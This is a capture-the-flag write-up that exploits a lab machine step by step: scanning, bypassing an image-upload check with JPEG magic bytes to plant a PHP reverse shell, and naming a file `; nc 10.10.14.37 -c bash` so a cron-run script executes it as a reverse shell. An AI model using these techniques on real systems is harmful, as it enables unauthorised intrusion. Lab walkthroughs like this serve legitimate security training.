As usual, we start with an nmap port scan:

```
$ nmap 10.10.10.146
```

We see that the following ports are open:
- 22: SSH
- 80: HTTP
- 443: HTTPS
When viewing the HTTP landing page, we are notified that creators are intending to invent the new Facemash. Facemash was a page which Mark Zuckerberg and his mates created during university. Essentially, it would display two images and the user would have to identify which was more physically attractive. The creation of a new Facemash hints that there will be an uploads page somewhere. Let us return to this thought later.
We can perform a GoBuster scan to identify any pages which we could upload things to:

```
$ gobuster dir \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -u http://10.10.10.146/
/uploads
/backup
```
We inspect the `/uploads` page, but we do not find anything there. So of course, we take a look at the `/backup` page. There we find a suspicious tar file named `backup.tar`. We download it to inspect the files within.

```
$ wget http://10.10.10.146/backup/backup.tar
$ tar -xvf backup.tar
```
It appears to be an archive of the site's pages. We try to navigate to `photos.php` and notice a lot of CentOS default photos. Additionally, when navigating to `upload.php` we are prompted with a file uploader. Good news for us! Let's inspect the `upload.php` file first.

`upload.php` checks the magic bits of the uploaded file to validate that only images are being uploaded. If the file passes this check, it is stored and can be viewed on the `photos.php` page.
Getting Initial Shell
We know we can upload pictures, however a reverse shell is not necessarily a picture. We can fool the file inspection by prepending the magic bits to the reverse shell file. In my case, I use the `.jpeg` magic bits, which are `ff d8`, to create a `magic-bits.jpeg` file, to which I will append the PHP reverse shell. We can verify that this was successful by using `xxd` to view the hexadecimal values at the beginning of the file.

```
$ echo "\xff\xd8" > magic-bits.jpeg
$ cat php-reverse-shell.php >> magic-bits.jpeg
$ cat magic-bits.jpeg | xxd | head -1
```
We upload the `magic-bits.jpeg` file to the server, which will then execute it. And it works! We capture the initial reverse shell.
www-data User Enumeration
We do not have permission to view `user.txt`; it belongs to the guly user. However, we do have permission to read some other files in the `/home/guly/` directory. Most importantly, we inspect the `crontab.guly` file. It regularly executes `check_attack.php`. Perhaps we can exploit this!
Pivoting to the guly User
We inspect the `check_attack.php` file and see that it watches files in the `/var/www/html/uploads/` directory. We can exploit this by creating a file with a semi-colon (`;`) in its name, which tricks check_attack.php into executing a further command. We must add `-c bash`, because otherwise just a regular connection would be opened, without a shell. We cannot use `-e /bin/bash` because slashes (`/`) are not allowed in filenames – it would not make sense. We wait a little bit, and then we capture the guly shell!

```
$ touch "; nc 10.10.14.37 -c bash"
```
As the guly user, we issue the `sudo -l` command to identify possible files which could be executed as root. We see that we can execute a shell script as the root user without a password. Perhaps we can exploit this!
We execute it and with a little trial and error and some perseverance, we can spawn a root shell! Perhaps I should have reviewed the code itself. Nevertheless, we have made it!
This was a fun easy box for sure! I find it interesting that I didn’t interact with ports 22 (SSH) or 443 (HTTPS) at all, but I guess for the path that I took, they were not necessary.
Thanks to the creator!